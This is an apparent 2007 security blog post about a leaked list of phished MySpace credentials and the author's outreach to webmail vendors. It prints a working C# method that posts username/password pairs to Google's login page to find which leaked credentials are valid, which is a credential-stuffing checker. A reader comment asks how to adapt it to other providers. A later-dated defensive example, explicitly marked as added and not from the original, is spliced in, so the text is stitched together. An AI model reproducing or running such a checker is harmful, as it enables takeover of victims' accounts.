If at first you don't succeed; call it version 1.0
Tuesday, 16 January 2007

Yesterday a huge list of MySpace usernames and passwords, harvested by phishers, was made public.
Most of the usernames in the list are email addresses at the major webmail providers: GMAIL, Hotmail, Yahoo! Mail and AOL.
Some of those MySpace users are probably using the same password for their webmail account, and probably for other web services too (eBay, Amazon, etc.).
Replaying the leaked pairs against those web services to find out which ones are also valid there is very easy; there is nothing to guess, the password is right there in the list. So I decided to first contact the webmail vendors (Google, Microsoft, Yahoo and AOL) and ask them to check the phishers' list against their own user databases, so that they can warn the affected users to change their passwords as soon as possible.
Over 21 hours later, only AOL has responded to my suggestion/request.
AOL's response (10 minutes after I sent the mail!):


Hi Aviv,

Thank you for the notification.  We noticed this on the Full-Disclosure list as well.  We will do everything we can to protect these users.

Thank you,

Kent L.
AOL Product Vulnerabilities


To demonstrate how easy it is to check which username/password pairs from the phishers' list are still valid, here is a C# method of about 20 lines that validates the username and password of a GMAIL account (the login URL, form fields and response markers are those of Google's login page at the time of writing):

using System;
using System.IO;
using System.Net;
using System.Text;

class GmailLoginCheck
{
   // Returns 1 if valid username/password, 0 if invalid, -1 if unknown.
   // Endpoint, form fields and response markers are those of Google's login page
   // at the time of this post (January 2007).
   private static int IsValidGmailLogin(string username, string password)
   {
      HttpWebRequest request = (HttpWebRequest)WebRequest.Create("https://www.google.com/accounts/ServiceLoginAuth");
      request.CookieContainer = new CookieContainer();   // keep the session cookies set during login
      request.Method = "POST";
      request.Referer = "https://www.google.com/accounts/ServiceLogin";
      request.ContentType = "application/x-www-form-urlencoded";
      // POST body: no leading '?' (that belongs in a URL query string, not a form body),
      // and the credentials are URL-encoded so '&', '=' or '%' in a password do not break the request.
      string data = "service=mail&Email=" + Uri.EscapeDataString(username)
                  + "&Passwd=" + Uri.EscapeDataString(password)
                  + "&rm=false&null=Sign%20in&continue=https://mail.google.com/mail?ui=html&zy=l";
      byte[] body = Encoding.ASCII.GetBytes(data);
      request.ContentLength = body.Length;   // length in bytes, not characters
      using (Stream reqStream = request.GetRequestStream())
         reqStream.Write(body, 0, body.Length);
      string resp;
      using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
      using (StreamReader sr = new StreamReader(response.GetResponseStream()))
         resp = sr.ReadToEnd();
      // A successful login answers with a JavaScript redirect (location.href) to the mailbox,
      // a failed one re-renders the login form; anything else is reported as unknown.
      return (resp.IndexOf("location.href") > -1) ? 1
           : (resp.IndexOf("<form action=\"LoginAuth\"") > -1) ? 0
           : -1;
   }
}
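The snippet above is the attacker's side of the problem. The check the post asks the webmail vendors to run is the mirror image, and the following C# is an added example of it; it is not code from the original post. It assumes a leaked list with one "email password" pair per line (the sample lines are constructed for this example), a provider that stores passwords only as salted PBKDF2-SHA256 hashes (so each leaked plaintext has to be re-derived with that account's salt rather than compared directly), and .NET 6 or later for `Rfc2898DeriveBytes.Pbkdf2` and `RandomNumberGenerator.GetBytes`. The class and method names (`LeakCheck`, `AccountsToWarn`, `StoredCredential`) are hypothetical.

```csharp
// Added example (not part of the original post): what a webmail provider could do with a
// leaked phishing list. List format, account store and names are assumptions for this example.
using System;
using System.Collections.Generic;
using System.Security.Cryptography;

static class LeakCheck
{
    const int Iterations = 100_000;

    // What the provider stores per account: a random per-user salt and PBKDF2-SHA256(password, salt).
    public sealed class StoredCredential
    {
        public byte[] Salt = Array.Empty<byte>();
        public byte[] Hash = Array.Empty<byte>();
    }

    static byte[] Derive(string password, byte[] salt) =>
        Rfc2898DeriveBytes.Pbkdf2(password, salt, Iterations, HashAlgorithmName.SHA256, 32);

    public static StoredCredential Store(string password)
    {
        byte[] salt = RandomNumberGenerator.GetBytes(16);
        return new StoredCredential { Salt = salt, Hash = Derive(password, salt) };
    }

    // Constant-time comparison, so the check itself does not leak which bytes matched.
    static bool Matches(string password, StoredCredential cred) =>
        CryptographicOperations.FixedTimeEquals(Derive(password, cred.Salt), cred.Hash);

    // Returns the accounts at ourDomain whose current password equals the one in the leaked list.
    // Lines for other providers, unknown accounts or with a different password are ignored.
    public static List<string> AccountsToWarn(
        IEnumerable<string> leakedLines,
        IReadOnlyDictionary<string, StoredCredential> accounts,
        string ourDomain)
    {
        var hits = new List<string>();
        foreach (string raw in leakedLines)
        {
            string line = raw.Trim();
            if (line.Length == 0 || line.StartsWith("#")) continue;
            // Split on the first whitespace only: a password may itself contain spaces.
            int sep = line.IndexOfAny(new[] { ' ', '\t' });
            if (sep < 0) continue;                                   // malformed line, skip it
            string email = line.Substring(0, sep).ToLowerInvariant();
            string password = line.Substring(sep + 1).Trim();
            int at = email.IndexOf('@');
            if (at < 0 || !email.Substring(at + 1).Equals(ourDomain, StringComparison.Ordinal)) continue;
            if (!accounts.TryGetValue(email, out var cred)) continue; // not one of our users
            if (Matches(password, cred)) hits.Add(email);
        }
        return hits;
    }

    static void Main()
    {
        // Constructed sample data: two accounts, one of which reused the leaked password.
        var accounts = new Dictionary<string, StoredCredential>
        {
            ["alice@example.com"] = Store("hunter2"),
            ["bob@example.com"] = Store("correct horse battery staple"),
        };
        string[] leaked =
        {
            "# phishing dump (constructed sample)",
            "alice@example.com hunter2",          // same password as the webmail account
            "bob@example.com password1",          // listed, but a different password
            "carol@example.com letmein",          // no such account here
            "dave@otherhost.net hunter2",         // another provider's domain
            "malformed-line-without-password",
        };
        foreach (string email in AccountsToWarn(leaked, accounts, "example.com"))
            Console.WriteLine("force password reset: " + email);
    }
}
```

With the sample data only alice@example.com is flagged: bob is on the list but with a different password, carol has no account here and dave belongs to another domain. Since the provider holds only hashes, the cost is one PBKDF2 derivation per listed address in its own domain, which is trivial next to what attackers will spend replaying the same list against the login page.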


Tuesday, 16 January 2007 19:04:06 UTC | Comments [1] | .NET | Security
Tuesday, 08 May 2007 11:41:10 UTC
How do you know which URL and referer id to send to GMail/Yahoo mail?
skov